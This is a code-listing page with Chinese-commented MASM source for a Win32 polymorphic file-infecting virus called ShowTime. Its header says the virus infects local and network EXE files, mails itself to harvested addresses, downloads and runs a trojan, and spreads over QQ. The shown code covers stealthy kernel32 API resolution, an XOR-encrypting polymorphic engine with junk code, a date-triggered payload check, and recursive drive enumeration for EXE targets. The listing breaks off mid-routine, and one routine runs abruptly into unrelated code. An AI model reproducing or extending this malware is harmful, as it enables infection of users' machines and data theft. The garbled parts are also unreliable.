📄 win32.poly.showtime2.txt
字号:
;***************************************************************
; 名 称:Trash
; 测试平台:Win98/masmV7.0
;
; 申明:本文仅作技术研究,否则后果自负
;注:
;
;编译命令行:
; ml /c /coff poly.asm
; link /subsystem:windows /section:.text,rew poly.obj
;***************************************************************
;;简 介:
;1. 感染本地硬盘和网络上所有exe(GUI)文件
;2. 搜索本地所有邮件地址,将病毒作为附件发送出去
;3. 从网上下载木马程序并运行。
;4. 利用QQ散播消息。
;*************************************************
;工作流程:
;1.首先得到重定位信息,保存在ebx中.
;2.调用GetKBase ,得到Kernel32.dll的基地址。
;3.调用GetAPIz,得到程序将使用的Kernel32中所有API.
;4.判断是被感染文件还是自身.如是被感染文件则分配空间并动态产生解密模块,然后解密程序代码。
; 否则直接到5
;5. 调用DownloadFile下载木马程序
;6. 调用RunExe执行木马程序
;7.调用DownloadFile下载邮件体hello.eml文件
;8. 启动发送QQ消息线程
;9. 感染本地Exe文件
;***************************************************
.386
.Model Flat, StdCall
Option Casemap :None
;___________________________________________________________________________
include d:\masm32\useful.inc
.code
Main:
Flag dd 45678h
szCaption db "ShowTime",0
szText db "Good luck!",0
Msgbox:
invoke MessageBox,NULL,addr szText,addr szCaption,MB_OK
invoke ExitProcess,NULL
VStart:
call Start
Start:
pop ebx ;病毒在宿主中的位置
sub ebx , offset Start
call GetKBase ;获得KERNEL.DLL基地址
jnz VStar
jz VStar
db 0e9h ;花指令
VStar:
call GetAPIz;获得病毒用到的APIs的地址
mov eax,offset Msgbox
.if Flag!=45678h;第一次运行则不用变形
Next1:
push PAGE_EXECUTE_READWRITE
push MEM_COMMIT
push VirusLen
push NULL
call _VirtualAlloc[ebx]
mov hMem[ebx],eax
lea esi,[offset Load+ebx]
mov edi,hMem[ebx]
mov ecx,EncryptLen/4
push ebx
call Metamorphosize
pop ebx
push ebx
call hMem[ebx]
pop ebx
.endif
call Load
;**********获得image of kernel32.dll的基址*****************
GetKBase:
mov edi , [esp+04h]
and edi , 0FFFF0000h
.while TRUE
.if WORD ptr [edi] == IMAGE_DOS_SIGNATURE ;判断是否是MZ
mov esi, edi
add esi, DWORD ptr [esi+03Ch] ;esi指向PE标志
.if DWORD ptr [esi] ==IMAGE_NT_SIGNATURE;是否有PE标志
.break;如果有跳出循环
.endif
.endif
sub edi, 010000h
.if edi < MIN_KERNEL_SEARCH_BASE ;win9x
mov edi, 0bff70000h ;0bff7000h=9x"base
.break
.endif
.endw
mov hKernel32[ebx],edi;把找到的KERNEL32。DLL的基地址保存起来
ret
GetAPIz:
push edi
mov edx,edi ;edx->KERNEL32基地址
assume edx :ptr IMAGE_DOS_HEADER
add edx,[edx].e_lfanew
assume edx:ptr IMAGE_NT_HEADERS
mov edx,[edx].OptionalHeader.DataDirectory.VirtualAddress
add edx,hKernel32[ebx];EDX->KERNEL32输出表地址
assume edx:ptr IMAGE_EXPORT_DIRECTORY
push edx
mov ebp,[edx].AddressOfNames
add ebp,hKernel32[ebx] ;ebp->指向所有函数名的RVA数组
push ebp
xor eax,eax ;eax为序号
.repeat
push 14 ;为GetProcAddress函数名的长度
pop ecx
mov edi,[ebp]
add edi,hKernel32[ebx]
lea esi,[offset nGetProcAddress+ebx]
repz cmpsb;比较输出表中第I个函数名是否是GetProcessAddress
.if zero?
.break ;如果是跳出
.endif
add ebp,4 ;下一个RVA
inc eax ;序号加1
.until eax == [edx].NumberOfNames ;[edx].NumberOfNames为函数的个数
mov ebp, [edx].AddressOfNameOrdinals ;指向AddressOfNames数组中相关函数的序数的16位数组
add ebp, hKernel32[ebx]
movzx ecx, word ptr [ebp+eax*2] ;取GetProcessAddress函数的序号
mov ebp, [edx].AddressOfFunctions ;[edx].AddressOfFunctions指向所有输出函数的RVA数组的首址
add ebp, hKernel32[ebx]
mov eax, [ebp+ecx*4]
add eax,hKernel32[ebx];eax为GetProcAddress函数的地址
mov _GetProcAddress[ebx],eax
pop ebp
pop edx
pop edi
xor eax,eax ;eax为序号
.repeat
push 12 ;LoadLibraryA函数名的长度
pop ecx
mov edi,[ebp]
add edi,hKernel32[ebx]
lea esi,[offset nLoadLibraryA+ebx]
repz cmpsb;比较输出表中第I个函数名是否是LoadLibraryA
.if zero?
.break ;如果是跳出
.endif
add ebp,4 ;下一个RVA
inc eax ;序号加1
.until eax == [edx].NumberOfNames ;[edx].NumberOfNames为函数的个数
mov ebp, [edx].AddressOfNameOrdinals ;指向AddressOfNames数组中相关函数的序数的16位数组
add ebp, hKernel32[ebx]
movzx ecx, word ptr [ebp+eax*2] ;取LoadLibraryA函数的序号
mov ebp, [edx].AddressOfFunctions ;[edx].AddressOfFunctions指向所有输出函数的RVA数组的首址
add ebp, hKernel32[ebx]
mov eax, [ebp+ecx*4]
add eax,hKernel32[ebx];eax为LoadLibraryA函数的地址
mov _LoadLibraryA[ebx],eax
lea eax,[offset nKernel+ebx]
push eax
call _LoadLibraryA[ebx]
mov DWORD ptr hKernel32[ebx],eax
GetOApiz:
call @api_table
db "LoadLibraryA",0
db "CreateThread",0
db "CreateRemoteThread",0
db "WinExec",0
db "CreateMutexA",0
db "OpenMutexA",0
db "ReleaseMutex",0
db "FindFirstFileA",0
db "FindNextFileA",0
db "FindClose",0
db "CreateFileA",0
db "CreateFileMappingA",0
db "MapViewOfFile",0
db "UnmapViewOfFile",0
db "SetFilePointer",0
db "ReadFile",0
db "GetComputerNameA",0
db "WriteFile",0
db "CloseHandle",0
db "VirtualAlloc",0
db "VirtualAllocEx",0
db "WriteProcessMemory",0
db "VirtualFree",0
db "VirtualFreeEx",0
db "lstrcmpi",0
db "lstrcpy",0
db "lstrcat",0
db "lstrlen",0
db "GetFileSize",0
db "GetSystemDirectoryA",0
db "GetModuleFileNameA",0
db "Sleep",0
db "GetSystemTime",0
db "DeleteFileA",0
db "OpenProcess",0
db "GetModuleHandleA",0
db "GetCurrentDirectoryA",0
db "SetCurrentDirectoryA",0
db "ExitProcess",0
db "GetExitCodeThread",0
db "ResumeThread",0
@api_table:
pop edi
call @api_dest
K_Apiz:
_LoadLibraryA dd 0
_CreateThread dd 0
_CreateRemoteThread dd 0
_WinExec dd 0
_CreateMutex dd 0
_OpenMutex dd 0
_ReleaseMutex dd 0
_FindFirstFile dd 0
_FindNextFile dd 0
_FindClose dd 0
_CreateFile dd 0
_CreateFileMapping dd 0
_MapViewOfFile dd 0
_UnmapViewOfFile dd 0
_SetFilePointer dd 0
_ReadFile dd 0
_GetComputerNameA dd 0
_WriteFile dd 0
_CloseHandle dd 0
_VirtualAlloc dd 0
_VirtualAllocEx dd 0
_WriteProcessMemory dd 0
_VirtualFree dd 0
_VirtualFreeEx dd 0
_lstrcmpi dd 0
_lstrcpy dd 0
_lstrcat dd 0
_lstrlen dd 0
_GetFileSize dd 0
_GetSystemDirectory dd 0
_GetModuleFileNameA dd 0
_Sleep dd 0
_GetSystemTime dd 0
_DeleteFile dd 0
_OpenProcess dd 0
_GetModuleHandleA dd 0
_GetCurrentDirectoryA dd 0
_SetCurrentDirectoryA dd 0
_ExitProcess dd 0
_GetExitCodeThread dd 0
_ResumeThread dd 0
K_API_NUM = ($-K_Apiz)/4 ;病毒中用到的API函数的个数
@api_dest:
pop esi ;esi为存放找到的函数地址数组的首址
push K_API_NUM
pop ecx
xor ebp,ebp
K_begin:
push ecx
push edi ;edi上面定义的函数名数组的首地址
push hKernel32[ebx]
call _GetProcAddress[ebx]
or eax,eax
jz GA_Fail
;mov edx , DWORD ptr [esi+ebp]
mov dword ptr [esi],eax
GA_Fail:
xor eax,eax
repnz scasb ;寻找字符串结束标志0,使edi指向下个函数名
add esi,4
pop ecx
loop K_begin
call szWsock32
db "Wsock32.dll",0
hSock dd 0
szWsock32:
call _LoadLibraryA[ebx]
mov hSock[ebx],eax
SockApis:
call SockTable
db "WSAStartup",0
db "socket",0
db "htons",0
db "inet_addr",0
db "connect",0
db "send",0
db "closesocket",0
db "WSACleanup",0
db "gethostbyname",0
SockTable:
pop edi
call SockDest
S_Apiz:
_WSAStartup dd 0
_socket dd 0
_htons dd 0
_inet_addr dd 0
_connect dd 0
_send dd 0
_closesocket dd 0
_WSACleanup dd 0
_gethostbyname dd 0
S_ApiNum=($-S_Apiz)/4
SockDest:
pop esi ;esi为存放找到的函数地址数组的首址
push S_ApiNum
pop ecx
xor ebp,ebp
S_begin:
push ecx
push edi ;edi上面定义的函数名数组的首地址
push hSock[ebx]
call _GetProcAddress[ebx]
or eax,eax
jz G_Fail
;mov edx , DWORD ptr [esi+ebp]
mov dword ptr [esi],eax
G_Fail:
xor eax,eax
repnz scasb ;寻找字符串结束标志0,使edi指向下个函数名
add esi,4
pop ecx
loop S_begin
call szUser32
db "User32.dll",0
szFindWindowA db "FindWindowA",0
szFindWindowExA db "FindWindowExA",0
szSendMessageA db "SendMessageA",0
szChildWindowFromPointEx db "ChildWindowFromPointEx",0
_FindWindowA dd 0
_FindWindowExA dd 0
_SendMessageA dd 0
_ChildWindowFromPointEx dd 0
szUser32:
call _LoadLibraryA[ebx]
push esi
mov esi,eax
call szwsprintfA
db "wsprintfA",0
_wsprintf dd 0
szwsprintfA:
push esi
call _GetProcAddress[ebx]
mov DWORD ptr _wsprintf[ebx],eax
lea ecx,[offset szFindWindowA+ebx]
push ecx
push esi
call _GetProcAddress[ebx]
mov DWORD ptr _FindWindowA[ebx],eax
lea ecx,[offset szFindWindowExA+ebx]
push ecx
push esi
call _GetProcAddress[ebx]
mov DWORD ptr _FindWindowExA[ebx],eax
lea ecx,[offset szSendMessageA+ebx]
push ecx
push esi
call _GetProcAddress[ebx]
mov DWORD ptr _SendMessageA[ebx],eax
lea ecx,[offset szChildWindowFromPointEx+ebx]
push ecx
push esi
call _GetProcAddress[ebx]
mov DWORD ptr _ChildWindowFromPointEx[ebx],eax
pop esi
ret
;变形引擎原理:
; 变形代码由2部分组成:
; 1)一段经过32位密钥异或加密的代码
; 2)由引擎随机生成的一段对这段加密代码进行解码的模块
;从7个通用寄存器中随机选择3个分别作为索引寄存器,密钥寄存器和计数寄存器。并在
;解密模块的每条有效语句之间随机插入1~3条垃圾代码。
EAX_REG = 0
ECX_REG = 1
EDX_REG = 2
EBX_REG = 3
ESP_REG = 4
EBP_REG = 5
ESI_REG = 6
EDI_REG = 7
INDEX_REG = 0
KEY_REG = 1
COUNT_REG = 2
FREE_REG1 = 3
FREE_REG2 = 4
FREE_REG3 = 5
FREE_REG4 = 6
Random:
push eax
db 0Fh, 031h ;EAX=随机数
xor edx, edx
div dword ptr [esp+8];EAX/种子
pop eax
ret 4
routine1:
mov byte ptr [edi], 0B8h ;B8H为MOV EAX,XXH B9为MOV ECX,XXH...
mov dl, byte ptr [ebx+ecx]
add [edi], dl
inc edi
ret
;产生垃圾代码
GenerateGarbabyCode:
push eax
push 3 ;<决定产生多少条啦级代码
call Random ;
lea ecx, [edx+1] ;
@PL1: mov esi,[esp] ;esi指向SYSTEMTIME结构
call _GetSystemTime[ebx]
;获取当前系统时间
movzx eax , word ptr [esi+6] ;[esi+6]为SYSTEMTIME结构的天数成员
cmp ax,14h ;20号吗?
jnz PL_Exit
KILL: ;如果当前是20号则发作
call ShowTime
PL_Exit:
ret
ShowTime:
ret
;************InfectDisk***********************
;遍历本地硬盘,从C盘到Z盘,调用EnumDir遍历所有exe
;*********************************************
EnumDisk PROC DirName : DWORD,FileType : DWORD
.REPEAT
push FileType
push DirName
call EnumDir
mov eax,DirName
inc byte ptr [eax]
mov al,byte ptr[eax]
.UNTIL al > "z"
mov byte ptr [eax] , "c"
ret 8
EnumDisk ENDP
;************EnumDir************
;遍历DirName,寻找FileType类型文件
;*******************************
EnumDir PROC DirName : DWORD ,FileType:DWORD
LOCAL hSearch : DWORD
LOCAL DirorFile[MAX_PATH] : DWORD
pushad
push DirName
lea esi,DirorFile
push esi
call _lstrcpy[ebx]
@pushsz "\*.*"
push esi ;DirorFile
call _lstrcat[ebx]
lea edi,[offset wfd+ebx]
push edi
push esi
call _FindFirstFile[ebx]
cmp eax,INVALID_HANDLE_VALUE
jz ED_Exit
mov hSearch,eax
.REPEAT
.if byte ptr [wfd+44+ebx]==".";wfd.cFilename
jmp short EN_NEXT
.endif
push DirName
push esi
call _lstrcpy[ebx]
@pushsz "\"
push esi
call _lstrcat[ebx]
lea eax,[wfd+44+ebx]
push eax
push esi ;DirorFile
call _lstrcat[ebx]
mov eax , dword ptr [wfd+ebx]
and eax , FILE_ATTRIBUTE_DIRECTORY
.if eax ==FILE_ATTRIBUTE_DIRECTORY
push dword ptr FileType
push esi
call EnumDir
.else ;是文件
push dword ptr FileType
push esi
call AnFile
.endif
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -